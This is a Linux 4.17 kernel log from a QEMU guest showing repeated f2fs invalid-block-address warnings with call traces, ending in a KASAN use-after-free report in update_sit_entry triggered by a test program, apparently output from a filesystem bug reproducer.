[ 1428.841694] CPU: 0 PID: 2741 Comm: a.out Tainted: G        W         4.17.0+ #1
[ 1428.841697] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.841702] RIP: 0010:f2fs_iget+0x1875/0x1a80
[ 1428.841703] Code: 8b 7d a8 4c 89 ff e8 ba 60 dc ff 49 8b 3f 41 b8 05 00 00 00 44 89 f1 48 c7 c2 c0 5a 57 a5 48 c7 c6 20 5b 57 a5 e8 db 59 01 00 <0f> 0b f0 41 80 4f 48 04 e9 5e f4 ff ff 0f 0b 4c 8b 7d b8 49 8d 7f 
[ 1428.841762] RSP: 0018:ffff8801ea2d7930 EFLAGS: 00010286
[ 1428.841767] RAX: 0000000000000000 RBX: ffff8801c9d25888 RCX: 0000000000000000
[ 1428.841770] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d45aefc
[ 1428.841774] RBP: ffff8801ea2d7a10 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1428.841777] R10: 0000000000000001 R11: ffffed003e743eba R12: ffff880192483000
[ 1428.841780] R13: ffff8801939e5d80 R14: 0000000000030000 R15: ffff8801939e5d80
[ 1428.841785] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.841788] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.841791] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.841795] Call Trace:
[ 1428.841805]  ? f2fs_lookup+0x2e7/0x580
[ 1428.841809]  f2fs_lookup+0x2e7/0x580
[ 1428.841815]  ? __recover_dot_dentries+0x400/0x400
[ 1428.841821]  ? __recover_dot_dentries+0x400/0x400
[ 1428.841827]  path_openat+0x1b15/0x1fa0
[ 1428.841834]  ? vfs_unlink+0x250/0x250
[ 1428.841839]  ? save_stack+0x94/0xb0
[ 1428.841844]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.841849]  ? kmem_cache_alloc+0xc8/0x1e0
[ 1428.841854]  ? getname_flags+0x73/0x2b0
[ 1428.841859]  ? do_sys_open+0x144/0x2a0
[ 1428.841865]  ? do_syscall_64+0x73/0x160
[ 1428.841871]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.841878]  ? __alloc_pages_slowpath+0x1260/0x1260
[ 1428.841883]  ? policy_nodemask+0x1a/0x90
[ 1428.841887]  ? policy_node+0x56/0x70
[ 1428.841893]  ? __mod_node_page_state+0x22/0xa0
[ 1428.841900]  ? __handle_mm_fault+0x119a/0x1920
[ 1428.841906]  do_filp_open+0x12b/0x1d0
[ 1428.841911]  ? may_open_dev+0x50/0x50
[ 1428.841917]  ? getname_flags+0x73/0x2b0
[ 1428.841923]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.841927]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.841934]  ? __alloc_fd+0x1b0/0x250
[ 1428.841940]  ? do_sys_open+0x175/0x2a0
[ 1428.841946]  do_sys_open+0x175/0x2a0
[ 1428.841951]  ? filp_open+0x50/0x50
[ 1428.841958]  do_syscall_64+0x73/0x160
[ 1428.841965]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.841969] RIP: 0033:0x7fb14306c040
[ 1428.841970] Code: 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 83 3d 09 27 2d 00 00 75 10 b8 02 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 7e e0 01 00 48 89 04 24 
[ 1428.842029] RSP: 002b:00007ffc651d93b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000002
[ 1428.842034] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fb14306c040
[ 1428.842037] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000002229080
[ 1428.842040] RBP: 00007ffc651d93f0 R08: 0000000002229010 R09: 0000000000000000
[ 1428.842043] R10: 000000000000069d R11: 0000000000000246 R12: 00000000004005c0
[ 1428.842047] R13: 00007ffc651d94f0 R14: 0000000000000000 R15: 0000000000000000
[ 1428.842051] ---[ end trace b1cfe6aeee92e9a5 ]---
[ 1428.842988] F2FS-fs (loop0): access invalid blkaddr:196608
[ 1428.843043] WARNING: CPU: 0 PID: 2741 at fs/f2fs/checkpoint.c:151 f2fs_is_valid_blkaddr+0x179/0x320
[ 1428.843044] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.843131] CPU: 0 PID: 2741 Comm: a.out Tainted: G        W         4.17.0+ #1
[ 1428.843134] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.843140] RIP: 0010:f2fs_is_valid_blkaddr+0x179/0x320
[ 1428.843141] Code: 85 e5 fe ff ff 48 89 df 88 44 24 07 e8 20 4b da ff 48 8b 3b 44 89 e1 48 c7 c2 00 f9 57 a5 48 c7 c6 a0 f7 57 a5 e8 47 44 ff ff <0f> 0b 0f b6 44 24 07 e9 b4 fe ff ff 48 8d 7f 60 e8 f2 4a da ff 48 
[ 1428.843202] RSP: 0018:ffff8801ea2d7838 EFLAGS: 00010282
[ 1428.843212] RAX: 0000000000000000 RBX: ffff8801939e5d80 RCX: 0000000000000000
[ 1428.843216] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d45aedd
[ 1428.843219] RBP: 0000000000000005 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1428.843222] R10: 0000000000000002 R11: ffffed003e743eba R12: 0000000000030000
[ 1428.843225] R13: ffff8801ee1be600 R14: 0000000000004000 R15: 0000000000003e00
[ 1428.843230] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.843233] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.843237] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.843242] Call Trace:
[ 1428.843255]  f2fs_allocate_data_block+0x664/0xc70
[ 1428.843264]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.843270]  do_write_page+0xc8/0x150
[ 1428.843279]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.843286]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.843296]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.843304]  ? __mod_node_page_state+0x22/0xa0
[ 1428.843309]  ? inc_zone_page_state+0x54/0x100
[ 1428.843315]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.843324]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.843331]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.843338]  ? __get_node_page+0x335/0x6b0
[ 1428.843344]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.843351]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.843358]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.843363]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.843372]  f2fs_file_mmap+0x79/0xc0
[ 1428.843380]  mmap_region+0x58b/0x880
[ 1428.843391]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.843396]  do_mmap+0x55b/0x7a0
[ 1428.843403]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.843410]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.843420]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.843427]  ? do_sys_open+0x206/0x2a0
[ 1428.843434]  ? __fget+0xb4/0x100
[ 1428.843439]  ksys_mmap_pgoff+0x278/0x360
[ 1428.843445]  ? find_mergeable_anon_vma+0x50/0x50
[ 1428.843454]  do_syscall_64+0x73/0x160
[ 1428.843462]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.843467] RIP: 0033:0x7fb1430766ba
[ 1428.843468] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1428.843528] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1428.843533] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1428.843536] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1428.843539] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1428.843542] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1428.843545] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[ 1428.843549] ---[ end trace b1cfe6aeee92e9a6 ]---
[ 1428.843611] F2FS-fs (loop0): invalid blkaddr: 196608, type: 5, run fsck to fix.
[ 1428.843845] WARNING: CPU: 0 PID: 2741 at fs/f2fs/f2fs.h:2685 f2fs_allocate_data_block+0xacb/0xc70
[ 1428.843846] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.844237] CPU: 0 PID: 2741 Comm: a.out Tainted: G        W         4.17.0+ #1
[ 1428.844240] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.844247] RIP: 0010:f2fs_allocate_data_block+0xacb/0xc70
[ 1428.844248] Code: ff ff 48 89 df e8 45 62 d7 ff 48 8b 3b 8b 4c 24 08 41 b8 05 00 00 00 48 c7 c2 00 0a 58 a5 48 c7 c6 60 0a 58 a5 e8 65 5b fc ff <0f> 0b f0 80 4b 48 04 e9 95 fb ff ff 48 89 df e8 11 62 d7 ff 48 8b 
[ 1428.844307] RSP: 0018:ffff8801ea2d7878 EFLAGS: 00010286
[ 1428.844311] RAX: 0000000000000000 RBX: ffff8801939e5d80 RCX: 0000000000000000
[ 1428.844315] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d45aee5
[ 1428.844318] RBP: ffff8801939dc000 R08: ffffed003e744f21 R09: ffffed003e744f21
[ 1428.844321] R10: 0000000000000002 R11: ffffed003e744f20 R12: ffff8801ea2d7ad4
[ 1428.844324] R13: 0000000000000000 R14: ffff8801949d4000 R15: 0000000000000000
[ 1428.844329] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.844332] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.844335] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.844339] Call Trace:
[ 1428.844348]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.844355]  do_write_page+0xc8/0x150
[ 1428.844363]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.844370]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.844376]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.844381]  ? __mod_node_page_state+0x22/0xa0
[ 1428.844386]  ? inc_zone_page_state+0x54/0x100
[ 1428.844391]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.844398]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.844405]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.844429]  ? __get_node_page+0x335/0x6b0
[ 1428.844440]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.844460]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.844484]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.844500]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.844512]  f2fs_file_mmap+0x79/0xc0
[ 1428.844530]  mmap_region+0x58b/0x880
[ 1428.844544]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.844566]  do_mmap+0x55b/0x7a0
[ 1428.844576]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.844586]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.844616]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.844632]  ? do_sys_open+0x206/0x2a0
[ 1428.844650]  ? __fget+0xb4/0x100
[ 1428.844673]  ksys_mmap_pgoff+0x278/0x360
[ 1428.844691]  ? find_mergeable_anon_vma+0x50/0x50
[ 1428.844712]  do_syscall_64+0x73/0x160
[ 1428.844736]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.844759] RIP: 0033:0x7fb1430766ba
[ 1428.844766] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1428.844868] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1428.844873] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1428.844876] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1428.844878] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1428.844881] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1428.844884] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[ 1428.844888] ---[ end trace b1cfe6aeee92e9a7 ]---
[ 1428.844892] F2FS-fs (loop0): access invalid blkaddr:196608
[ 1428.844936] WARNING: CPU: 0 PID: 2741 at fs/f2fs/checkpoint.c:151 f2fs_is_valid_blkaddr+0x179/0x320
[ 1428.844937] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.845058] CPU: 0 PID: 2741 Comm: a.out Tainted: G        W         4.17.0+ #1
[ 1428.845061] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.845066] RIP: 0010:f2fs_is_valid_blkaddr+0x179/0x320
[ 1428.845067] Code: 85 e5 fe ff ff 48 89 df 88 44 24 07 e8 20 4b da ff 48 8b 3b 44 89 e1 48 c7 c2 00 f9 57 a5 48 c7 c6 a0 f7 57 a5 e8 47 44 ff ff <0f> 0b 0f b6 44 24 07 e9 b4 fe ff ff 48 8d 7f 60 e8 f2 4a da ff 48 
[ 1428.845144] RSP: 0018:ffff8801ea2d77d8 EFLAGS: 00010282
[ 1428.845148] RAX: 0000000000000000 RBX: ffff8801939e5d80 RCX: 0000000000000000
[ 1428.845151] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d45aed1
[ 1428.845154] RBP: 0000000000000005 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1428.845157] R10: 0000000000000002 R11: ffffed003e743eba R12: 0000000000030000
[ 1428.845160] R13: ffff8801ee1be600 R14: 0000000000004000 R15: 0000000000003e00
[ 1428.845165] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.845168] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.845171] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.845175] Call Trace:
[ 1428.845183]  update_sit_entry+0x431/0x7f0
[ 1428.845191]  f2fs_allocate_data_block+0x6db/0xc70
[ 1428.845199]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.845205]  do_write_page+0xc8/0x150
[ 1428.845213]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.845220]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.845226]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.845231]  ? __mod_node_page_state+0x22/0xa0
[ 1428.845236]  ? inc_zone_page_state+0x54/0x100
[ 1428.845241]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.845248]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.845255]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.845262]  ? __get_node_page+0x335/0x6b0
[ 1428.845270]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.845278]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.845283]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.845290]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.845296]  f2fs_file_mmap+0x79/0xc0
[ 1428.845303]  mmap_region+0x58b/0x880
[ 1428.845311]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.845316]  do_mmap+0x55b/0x7a0
[ 1428.845322]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.845329]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.845336]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.845342]  ? do_sys_open+0x206/0x2a0
[ 1428.845347]  ? __fget+0xb4/0x100
[ 1428.845353]  ksys_mmap_pgoff+0x278/0x360
[ 1428.845359]  ? find_mergeable_anon_vma+0x50/0x50
[ 1428.845365]  do_syscall_64+0x73/0x160
[ 1428.845372]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.845376] RIP: 0033:0x7fb1430766ba
[ 1428.845377] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1428.845439] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1428.845444] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1428.845447] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1428.845450] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1428.845453] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1428.845455] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[ 1428.845460] ---[ end trace b1cfe6aeee92e9a8 ]---
[ 1428.845464] F2FS-fs (loop0): invalid blkaddr: 196608, type: 5, run fsck to fix.
[ 1428.845698] WARNING: CPU: 0 PID: 2741 at fs/f2fs/f2fs.h:2685 update_sit_entry+0x6dc/0x7f0
[ 1428.845699] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.845769] CPU: 0 PID: 2741 Comm: a.out Tainted: G        W         4.17.0+ #1
[ 1428.845772] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.845778] RIP: 0010:update_sit_entry+0x6dc/0x7f0
[ 1428.845779] Code: ff ff 48 89 ef e8 b4 ab d7 ff 48 8b 7d 00 41 b8 05 00 00 00 44 89 f9 48 c7 c2 00 0a 58 a5 48 c7 c6 60 0a 58 a5 e8 d4 a4 fc ff <0f> 0b f0 80 4d 48 04 e9 51 fd ff ff 0f b7 53 02 8d 4a 01 66 81 e2 
[ 1428.845845] RSP: 0018:ffff8801ea2d7818 EFLAGS: 00010286
[ 1428.845850] RAX: 0000000000000000 RBX: ffff8801939e5d80 RCX: 0000000000000000
[ 1428.845853] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d45aed9
[ 1428.845856] RBP: ffff8801939e5d80 R08: ffffed003e743ebb R09: ffffed003e743ebb
[ 1428.845860] R10: 0000000000000002 R11: ffffed003e743eba R12: ffff8801ea2d7ad4
[ 1428.845863] R13: 00000000ffffffff R14: 0000000000000178 R15: 0000000000030000
[ 1428.845867] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.845870] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.845874] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.845878] Call Trace:
[ 1428.845887]  f2fs_allocate_data_block+0x6db/0xc70
[ 1428.845894]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.845901]  do_write_page+0xc8/0x150
[ 1428.845909]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.845916]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.845922]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.845927]  ? __mod_node_page_state+0x22/0xa0
[ 1428.845932]  ? inc_zone_page_state+0x54/0x100
[ 1428.845937]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.845945]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.845952]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.845958]  ? __get_node_page+0x335/0x6b0
[ 1428.845964]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.845971]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.845977]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.845982]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.845988]  f2fs_file_mmap+0x79/0xc0
[ 1428.845994]  mmap_region+0x58b/0x880
[ 1428.846001]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.846006]  do_mmap+0x55b/0x7a0
[ 1428.846013]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.846019]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.846027]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.846033]  ? do_sys_open+0x206/0x2a0
[ 1428.846038]  ? __fget+0xb4/0x100
[ 1428.846044]  ksys_mmap_pgoff+0x278/0x360
[ 1428.846049]  ? find_mergeable_anon_vma+0x50/0x50
[ 1428.846056]  do_syscall_64+0x73/0x160
[ 1428.846063]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.846067] RIP: 0033:0x7fb1430766ba
[ 1428.846068] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1428.846127] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1428.846132] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1428.846135] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1428.846137] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1428.846140] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1428.846143] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[ 1428.846148] ---[ end trace b1cfe6aeee92e9a9 ]---
[ 1428.846150] ==================================================================
[ 1428.846352] BUG: KASAN: use-after-free in update_sit_entry+0x80/0x7f0
[ 1428.846618] Read of size 4 at addr ffff880194483540 by task a.out/2741

[ 1428.846855] CPU: 0 PID: 2741 Comm: a.out Tainted: G        W         4.17.0+ #1
[ 1428.846858] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.846860] Call Trace:
[ 1428.846868]  dump_stack+0x71/0xab
[ 1428.846875]  print_address_description+0x6b/0x290
[ 1428.846881]  kasan_report+0x28e/0x390
[ 1428.846888]  ? update_sit_entry+0x80/0x7f0
[ 1428.846898]  update_sit_entry+0x80/0x7f0
[ 1428.846906]  f2fs_allocate_data_block+0x6db/0xc70
[ 1428.846914]  ? f2fs_get_node_info+0x14f/0x590
[ 1428.846920]  do_write_page+0xc8/0x150
[ 1428.846928]  f2fs_outplace_write_data+0xfe/0x210
[ 1428.846935]  ? f2fs_do_write_node_page+0x170/0x170
[ 1428.846941]  ? radix_tree_tag_clear+0xff/0x130
[ 1428.846946]  ? __mod_node_page_state+0x22/0xa0
[ 1428.846951]  ? inc_zone_page_state+0x54/0x100
[ 1428.846956]  ? __test_set_page_writeback+0x336/0x5d0
[ 1428.846964]  f2fs_convert_inline_page+0x407/0x6d0
[ 1428.846971]  ? f2fs_read_inline_data+0x3b0/0x3b0
[ 1428.846978]  ? __get_node_page+0x335/0x6b0
[ 1428.846987]  f2fs_convert_inline_inode+0x41b/0x500
[ 1428.846994]  ? f2fs_convert_inline_page+0x6d0/0x6d0
[ 1428.847000]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.847005]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.847024]  f2fs_file_mmap+0x79/0xc0
[ 1428.847029]  mmap_region+0x58b/0x880
[ 1428.847037]  ? arch_get_unmapped_area+0x370/0x370
[ 1428.847042]  do_mmap+0x55b/0x7a0
[ 1428.847048]  vm_mmap_pgoff+0x16f/0x1c0
[ 1428.847055]  ? vma_is_stack_for_current+0x50/0x50
[ 1428.847062]  ? __fsnotify_update_child_dentry_flags.part.1+0x160/0x160
[ 1428.847068]  ? do_sys_open+0x206/0x2a0
[ 1428.847073]  ? __fget+0xb4/0x100
[ 1428.847079]  ksys_mmap_pgoff+0x278/0x360
[ 1428.847085]  ? find_mergeable_anon_vma+0x50/0x50
[ 1428.847091]  do_syscall_64+0x73/0x160
[ 1428.847098]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.847102] RIP: 0033:0x7fb1430766ba
[ 1428.847103] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00 
[ 1428.847162] RSP: 002b:00007ffc651d9388 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 1428.847167] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb1430766ba
[ 1428.847170] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 1428.847173] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[ 1428.847176] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[ 1428.847179] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000

[ 1428.847252] Allocated by task 2683:
[ 1428.847372]  kasan_kmalloc+0xa6/0xd0
[ 1428.847380]  kmem_cache_alloc+0xc8/0x1e0
[ 1428.847385]  getname_flags+0x73/0x2b0
[ 1428.847390]  user_path_at_empty+0x1d/0x40
[ 1428.847395]  vfs_statx+0xc1/0x150
[ 1428.847401]  __do_sys_newlstat+0x7e/0xd0
[ 1428.847405]  do_syscall_64+0x73/0x160
[ 1428.847411]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[ 1428.847466] Freed by task 2683:
[ 1428.847566]  __kasan_slab_free+0x137/0x190
[ 1428.847571]  kmem_cache_free+0x85/0x1e0
[ 1428.847575]  filename_lookup+0x191/0x280
[ 1428.847580]  vfs_statx+0xc1/0x150
[ 1428.847585]  __do_sys_newlstat+0x7e/0xd0
[ 1428.847590]  do_syscall_64+0x73/0x160
